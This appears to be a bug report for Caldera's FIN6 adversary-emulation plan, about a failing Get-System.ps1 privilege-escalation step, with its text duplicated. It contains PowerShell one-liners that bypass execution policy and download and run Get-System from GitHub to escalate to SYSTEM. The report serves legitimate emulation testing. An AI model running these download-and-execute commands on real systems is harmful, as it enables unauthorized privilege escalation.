When executing the FIN6 emulation plan (or any plan that uses the Get-System.ps1 payload), the script fails with the following error:
Get-ProcAddress : Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
This is a known issue in PowerSploit’s Get-System.ps1 because .NET reflection on GetProcAddress is ambiguous on recent Windows versions. The BC‑SECURITY/Empire fork already contains the fix.
To Reproduce
Run the following command on a modern Windows 10/11 system (fully updated) within the context of the FIN6 YAML plan:
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1'); Get-System -ServiceName 'mstdc' -PipeName 'mstdc'"
Expected behavior
The Get-System script should execute successfully, escalate privileges to SYSTEM via named pipe impersonation, and continue the Caldera operation without errors.
Environment
Windows version: Windows Server 2019
Suggested fix
Update the FIN6 YAML ability that invokes Get-System.ps1 to use the fixed version from BC‑SECURITY/Empire:
https://raw.githubusercontent.com/BC-SECURITY/Empire/v3.4.0/data/module_source/privesc/Get-System.ps1
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/v3.4.0/data/module_source/privesc/Get-System.ps1'); Get-System -ServiceName 'mstdc' -PipeName 'mstdc'"
Here is the screenshot of the new powershell command:

When executing the FIN6 emulation plan (or any plan that uses the Get-System.ps1 payload), the script fails with the following error:
Get-ProcAddress : Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."This is a known issue in PowerSploit’s Get-System.ps1 because .NET reflection on GetProcAddress is ambiguous on recent Windows versions. The BC‑SECURITY/Empire fork already contains the fix.
To Reproduce
Run the following command on a modern Windows 10/11 system (fully updated) within the context of the FIN6 YAML plan:
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1'); Get-System -ServiceName 'mstdc' -PipeName 'mstdc'"Expected behavior
The Get-System script should execute successfully, escalate privileges to SYSTEM via named pipe impersonation, and continue the Caldera operation without errors.
Environment
Suggested fix
Update the FIN6 YAML ability that invokes Get-System.ps1 to use the fixed version from BC‑SECURITY/Empire:
https://raw.githubusercontent.com/BC-SECURITY/Empire/v3.4.0/data/module_source/privesc/Get-System.ps1
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/v3.4.0/data/module_source/privesc/Get-System.ps1'); Get-System -ServiceName 'mstdc' -PipeName 'mstdc'"Here is the screenshot of the new powershell command: